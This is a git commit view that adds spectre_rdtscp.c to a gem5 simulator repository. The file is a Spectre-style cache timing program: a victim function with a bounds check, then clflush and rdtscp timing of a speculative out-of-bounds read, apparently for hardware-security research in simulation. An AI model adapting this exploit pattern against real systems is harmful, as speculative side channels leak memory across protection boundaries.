summaryrefslogtreecommitdiff
path: root/attack_code/spectre_rdtscp.c
diff options
context:
space:
mode:
authorIru Cai <mytbk920423@gmail.com>2019-02-28 17:08:59 +0800
committerIru Cai <mytbk920423@gmail.com>2019-03-20 22:07:22 +0800
commit4f0ae0a1868a02e3d784e0c18eed02cbfdd7b4d6 (patch)
tree3cb7bed188f294c7ce071550c6a24f900f463d9f /attack_code/spectre_rdtscp.c
parent2235ccedc751ccd78ed742081290f8f2fb20ca85 (diff)
downloadgem5-4f0ae0a1868a02e3d784e0c18eed02cbfdd7b4d6.tar.xz
attack code and exp scriptis-rebase12
Diffstat (limited to 'attack_code/spectre_rdtscp.c')
-rw-r--r--attack_code/spectre_rdtscp.c77
1 files changed, 77 insertions, 0 deletions
diff --git a/attack_code/spectre_rdtscp.c b/attack_code/spectre_rdtscp.c
new file mode 100644
index 000000000..f4700d2cd
--- /dev/null
+++ b/attack_code/spectre_rdtscp.c
@@ -0,0 +1,77 @@
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <x86intrin.h> /* for rdtscp and clflush */
+
+/********************************************************************
+Victim code.
+********************************************************************/
+unsigned int array1_size = 16;
+uint8_t unused1[64];
+uint8_t array1[640] = {};
+
+uint8_t temp;
+
+void victim_function(size_t x) {
+ if (x < array1_size) {
+ temp &= array1[x];
+ }
+}
+
+/********************************************************************
+Analysis code
+********************************************************************/
+
+size_t malicious_x = 128;//index to array1
+#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
+
+/* Report best guess in value[0] and runner-up in value[1] */
+void testSpec(size_t fetch_index) {
+ int tries, i, j, k, mix_i, junk = 0;
+ register uint64_t time1, time2;
+ volatile uint8_t * addr;
+
+ for (tries = 20; tries > 0; tries--) {
+
+ _mm_clflush( & array1_size); //make branch resolved sloowly
+ _mm_clflush( array1+malicious_x ); //flush out-of-boundary address
+ _mm_clflush( array1+fetch_index ); //flush within-boundary address
+
+ for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
+
+ /*fetch one element in the array*/
+ victim_function(fetch_index);
+
+
+ for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
+
+ time1 = __rdtscp( &junk );
+ time1 = __rdtscp( &junk );
+
+ addr = array1 + malicious_x;
+ junk = * addr; // MEMORY ACCESS TO TIME
+
+ time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME
+ time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME
+
+
+ printf("time = %ld\n", time2);
+ }
+}
+
+
+
+int main(int argc, const char * * argv) {
+
+ printf("malicious_x = %p... ", (void * ) malicious_x);
+
+ printf("fetch 0th element, \nno misprediction, \nsuppose to see miss + no squash\n");
+ testSpec(0);
+
+ printf("fetch malicious_x, \nmispredict with speculative load, \nsuppose to see hit + squash\n");
+ testSpec(malicious_x);
+
+ printf("fetch malicious_x * 2, \nmispredict with speculative load different address, \nsuppose to see miss + squash\n");
+ testSpec(malicious_x*2);
+ return (0);
+}